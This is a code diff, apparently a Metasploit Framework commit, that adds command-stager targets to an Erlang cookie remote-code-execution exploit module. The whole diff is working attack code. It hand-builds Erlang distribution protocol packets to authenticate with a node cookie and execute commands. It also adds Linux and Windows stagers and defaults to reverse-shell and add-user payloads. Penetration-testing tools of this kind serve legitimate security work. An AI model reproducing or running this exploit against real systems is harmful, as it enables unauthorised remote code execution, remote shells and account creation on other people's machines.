Add CmdStager to erlang_cookie_rce
Jacob Robles
parent
0471d69c16
commit
4bc871c499
|
|
@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
Rank = GreatRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(
|
||||
|
|
@ -28,8 +29,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
['URL', 'https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['unix', 'win'],
|
||||
'Arch' => ARCH_CMD,
|
||||
'Privileged' => 'false',
|
||||
'Targets' =>
|
||||
[
|
||||
|
|
@ -38,10 +37,23 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'},
|
||||
],
|
||||
[ 'Linux (CmdStager)',
|
||||
'Type' => :cmdstager,
|
||||
'Platform' => 'linux',
|
||||
'Arch' => [ARCH_X64, ARCH_X86],
|
||||
'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
|
||||
],
|
||||
[ 'Windows',
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_CMD,
|
||||
'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'},
|
||||
],
|
||||
[ 'Windows (CmdStager)',
|
||||
'Type' => :cmdstager,
|
||||
'Platform' => 'win',
|
||||
'Arch' => [ARCH_X64, ARCH_X86],
|
||||
'CmdStagerFlavor' => ['certutil', 'vbs'],
|
||||
'DefaultOptions' => {'PAYLOAD' => 'windows/shell/reverse_tcp'}
|
||||
]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
|
|
@ -67,26 +79,10 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
return [hash.hexdigest].pack('H*')
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
|
||||
|
||||
# SEND_NAME: send initial identification of who "we" are
|
||||
send_name = "\x00" # Length: 0x0000
|
||||
send_name << [(our_node.length+7).to_s(16)].pack('H*') #
|
||||
send_name << "\x6e" # Tag: n
|
||||
send_name << "\x00\x05" # Version: R6 (5)
|
||||
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
|
||||
send_name << "#{our_node}" # <generated>@<generated>
|
||||
|
||||
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
|
||||
send_challenge_reply = "\x00\x15" # Length: 21
|
||||
send_challenge_reply << "\x72" # Tag: r
|
||||
|
||||
def execute_command(cmd, opts={})
|
||||
# SEND: send the message to the node
|
||||
send = "\x00\x00\x00" # Length:0x00000000
|
||||
send << [(0x50 + payload.raw.length + our_node.length*2).to_s(16)].pack('H*') #
|
||||
send << [(0x50 + cmd.length + @our_node.length*2).to_s(16)].pack('H*') #
|
||||
send << "\x70" #
|
||||
send << "\x83" # VERSION_MAGIC
|
||||
send << "\x68" # SMALL_TUPLE_EXT (104)
|
||||
|
|
@ -95,8 +91,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
send << "\x06" # Int: 6
|
||||
send << "\x67" # PID_EXT (103)
|
||||
send << "\x64\x00" # Node:
|
||||
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
|
||||
send << "#{our_node}" # Node
|
||||
send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
|
||||
send << "#{@our_node}" # Node
|
||||
send << "\x00\x00\x00\x03" # ID
|
||||
send << "\x00\x00\x00\x00" # Serial
|
||||
send << "\x00" # Creation
|
||||
|
|
@ -106,8 +102,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
send << "\x00\x03" # Length: 3
|
||||
send << "rex" # AtomText: rex
|
||||
send << "\x83\x68\x02\x67\x64\x00" #
|
||||
send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
|
||||
send << "#{our_node}" # Node
|
||||
send << [(@our_node.length).to_s(16)].pack('H*') # Length: strlen(Node)
|
||||
send << "#{@our_node}" # Node
|
||||
send << "\x00\x00\x00\x03" # ID
|
||||
send << "\x00\x00\x00\x00" # Serial
|
||||
send << "\x00" # Creation
|
||||
|
|
@ -126,12 +122,31 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
send << "\x00\x00\x00\x01" # Length: 1
|
||||
send << "\x6b" # Elements: k
|
||||
send << "\x00" # Tail
|
||||
send << [(payload.raw.length).to_s(16)].pack('H*') # strlen(Command)
|
||||
send << payload.raw # Command
|
||||
send << [(cmd.length).to_s(16)].pack('H*') # strlen(Command)
|
||||
send << cmd
|
||||
send << "\x6a" # NIL_EXT
|
||||
send << "\x64" # InternalSegmentIndex
|
||||
send << "\x00\x04" # Length: 4
|
||||
send << "user" # AtomText: user
|
||||
sock.put(send)
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect
|
||||
|
||||
@our_node = "#{rand_text_alphanumeric(6..12)}@#{rand_text_alphanumeric(6..12)}"
|
||||
|
||||
# SEND_NAME: send initial identification of who "we" are
|
||||
send_name = "\x00" # Length: 0x0000
|
||||
send_name << [(@our_node.length+7).to_s(16)].pack('H*') #
|
||||
send_name << "\x6e" # Tag: n
|
||||
send_name << "\x00\x05" # Version: R6 (5)
|
||||
send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c)
|
||||
send_name << "#{@our_node}" # <generated>@<generated>
|
||||
|
||||
# SEND_CHALLENGE_REPLY: return generated digest and its own challenge
|
||||
send_challenge_reply = "\x00\x15" # Length: 21
|
||||
send_challenge_reply << "\x72" # Tag: r
|
||||
|
||||
sock.put(send_name)
|
||||
|
||||
|
|
@ -151,6 +166,13 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
print_good("Authentication successful, sending payload")
|
||||
sock.put(send)
|
||||
|
||||
print_status('Exploiting...')
|
||||
if target['Type'] == :cmdstager
|
||||
execute_cmdstager(:linemax => 100)
|
||||
else
|
||||
execute_command(payload.raw)
|
||||
end
|
||||
disconnect
|
||||
end
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue